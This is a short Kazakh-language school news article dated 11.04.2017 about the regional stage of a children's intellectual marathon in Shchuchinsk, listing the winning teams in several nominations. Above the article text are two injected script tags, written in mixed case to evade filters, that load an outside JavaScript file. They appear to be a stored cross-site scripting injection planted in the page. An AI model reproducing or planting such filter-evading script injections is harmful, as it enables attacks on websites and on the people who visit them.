<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

11.04.2017

«Білімге  жол» балалардың  интеллектуалдық  марафонының  облыстық  кезеңі  Щучинск 

қ.  №7  мектеп-лицейінің  базасында  өтті. Іс-шараның  басты  мақсаттары 

білім  беруді  дамытудың  мемлекеттік  бағдарламасын  жүзеге 

асыру,  педагогтар  мен оқушылардың  білім  беру  қорлары 

мен  технологияларға  қол жетімділігін  қамтамасыз  ету, 

балаларды  жан-жақты  қолдау және  олардың  шығармашылық 

кабілеттерінің  өзіндік  жүзеге асуына  ықпал  ету 

болып  табылады.        Бурабай ауданының  намысын  5 

команда  қорғады.  Іс-шара төрт  бөлімнен  тұрды: ашылуы,  конкурстық  бөлім-командалардың  тапсырмаларды 

орындау  арқылы  «станциялардан»  ретпен (маршруттық  бетке 

сәйкес) өтуі  және  конкурстың жабылуы, оған  концерттік  бағдарлама 

және  қатысушылар  және фестиваль  лауреаттарын  марапаттау 

кірді.

       Щучинск  қаласы мектеп-интернатының тәрбиеленушілері  «Табиғатты  қорғаушылар» 

номинациясында  жеңімпаздар  атанса, Щучинск  қаласы  №8 М/Г  оқушылары  «Жас 

математиктер»  номинациясында  үздіктер қатарында  болды,  ал «Шұғыла»  шағын  орталығының 

тәрбиеленушілері  «Жас  полиглоттар» номинациясында жеңімпаз атанды.  «Жас  өркен» 

номинациясында  Щучинск  қаласы №9  М/Г  жас гимназшылары  жеңімпаз  атанды.

      Жас  таланттарға дипломдар  мен  кубоктар, білім  беру  орталығында оқу  үшін  сертификаттар,  жеке 

сыйлықтар  берілді.

Просмотров: 831


Пікір қосу



Деректерді қолтаңбаға қосу